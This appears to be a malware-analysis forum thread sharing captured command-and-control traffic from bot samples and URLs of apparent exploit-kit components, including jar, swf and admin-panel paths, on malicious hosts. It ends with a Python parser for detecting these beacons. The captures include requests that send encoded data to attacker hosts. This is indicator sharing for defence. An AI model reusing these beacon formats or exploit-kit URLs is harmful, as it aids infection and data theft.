 #13032  by Xylitol
 Fri May 04, 2012 5:54 pm
Code:
GET /all/dg797FDFddd.php?id=8065D52C494C59584F54&cmd=img HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: dom1ver.4hourspill.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK

---

GET /all/dg797FDFddd.php?id=8065D52C494C59584F54&cmd=geo HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: dom1ver.4hourspill.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK

---

GET /all/dg797FDFddd.php?id=8065D52C494C59584F54&cmd=lfk&data=E0pNkdbKItWRDUbygAZKv9QKVlrG HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: dom1ver.4hourspill.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK

---

GET /all/dg797FDFddd.php?id=8065D52C494C59584F54&stat=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: dom1ver.4hourspill.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Code:
http://dom1ver.4hourspill.com/it/dg797FDFddd.php
http://dom1ver.4hourspill.com/fr/dg797FDFddd.php
http://dom1ver.4hourspill.com/es/dg797FDFddd.php
http://dom1ver.4hourspill.com/ca/dg797FDFddd.php
http://dom1ver.4hourspill.com/cn/dg797FDFddd.php
http://dom1ver.4hourspill.com/gr/dg797FDFddd.php
http://dom1ver.4hourspill.com/all/dg797FDFddd.php
Bhole:
http://dom1ver.4hourspill.com/bhstat.php?threadID=22&ruleID=33&key=0c382c13dbaca1490c207a89b61a2c53
http://dom1ver.4hourspill.com/bhadmin.php
http://dom1ver.4hourspill.com/data/1x1.gif
http://dom1ver.4hourspill.com/data/Klot.jar
http://dom1ver.4hourspill.com/data/Pol.jar
http://dom1ver.4hourspill.com/data/Qai.jar
http://dom1ver.4hourspill.com/data/ap1.php
http://dom1ver.4hourspill.com/data/ap2.php
http://dom1ver.4hourspill.com/data/field.swf
http://dom1ver.4hourspill.com/data/hcp_asx.php
http://dom1ver.4hourspill.com/data/hcp_vbs.php
http://dom1ver.4hourspill.com/data/hhcp.php
http://dom1ver.4hourspill.com/data/score.swf
 #13044  by Xylitol
 Sat May 05, 2012 7:58 am
Another sample, targeting German people.
https://www.virustotal.com/file/7d9fc49 ... /analysis/

Code:
GET /a.php?id=8065D52C494C59584F54&stat=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: horad-forum.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK

---

GET /a.php?id=8065D52C494C59584F54&cmd=key&data=1:0:MTIzNDU2Nzg5MDEyMzQ1Ng== HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: horad-forum.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK

---

GET /a.php?id=8065D52C494C59584F54&stat=240 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: horad-forum.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK

---

GET /a.php?id=8065D52C494C59584F54&cmd=key&data=1:1:MTIzNDU2Nzg5MDEyMzQ1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: horad-forum.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK
Attachments: infected (67.61 KiB)
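One way to pick this check-in pattern out of proxy or IDS logs, as an added example that is not code from the thread: the parser below replays request lines copied from the captures above, keys on the 20-hex `id` together with a `cmd=` or `stat=` parameter, and decodes the base64 `data` field of the `key`/`lfk` commands (the regex, the `<n>:<n>:` prefix handling and the benign control line are my assumptions from the captures, not documented bot behaviour).

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: request lines copied from the captures in this thread
# plus one benign line; nothing is sent on the wire.
SAMPLE_REQUESTS = [
    "GET /all/dg797FDFddd.php?id=8065D52C494C59584F54&cmd=img HTTP/1.1",
    "GET /all/dg797FDFddd.php?id=8065D52C494C59584F54&cmd=lfk&data=E0pNkdbKItWRDUbygAZKv9QKVlrG HTTP/1.1",
    "GET /a.php?id=8065D52C494C59584F54&cmd=key&data=1:0:MTIzNDU2Nzg5MDEyMzQ1Ng== HTTP/1.1",
    "GET /a.php?id=8065D52C494C59584F54&stat=240 HTTP/1.1",
    "GET /index.html?id=42 HTTP/1.1",
]
BOT_ID_RE = re.compile(r"^[0-9A-F]{20}$")  # assumption: 20 upper-case hex digits, as in every capture

def decode_data(value):
    """cmd=key carries <n>:<n>:<base64>, cmd=lfk a bare base64 token.
    Returns (prefix fields, decoded text or None if not printable ASCII)."""
    *prefix, payload = value.split(":")
    try:
        raw = base64.b64decode(payload, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return prefix, None
    if raw and all(32 <= b < 127 for b in raw):
        return prefix, raw.decode("ascii")
    return prefix, None

def parse_beacon(request_line):
    """Parse one request line; None unless it has a 20-hex id and cmd= or stat=."""
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[0] != "GET":
        return None
    url = urlsplit(parts[1])
    query = parse_qs(url.query)  # splits on the first '=' only, so base64 padding survives
    bot_id = query.get("id", [""])[0]
    if not BOT_ID_RE.match(bot_id) or not ("cmd" in query or "stat" in query):
        return None
    info = {"id": bot_id, "path": url.path,
            "cmd": query.get("cmd", [None])[0],
            "stat": query.get("stat", [None])[0]}
    if "data" in query:
        info["data"] = decode_data(query["data"][0])
    return info

def scan(lines):
    """Return the beacons found in an iterable of request lines (log replay)."""
    return [b for b in map(parse_beacon, lines) if b]
```

Running `scan(SAMPLE_REQUESTS)` flags the four beacon lines and skips the benign one; the `lfk` payload does not decode to printable text, while both `key` payloads decode to plain digit strings.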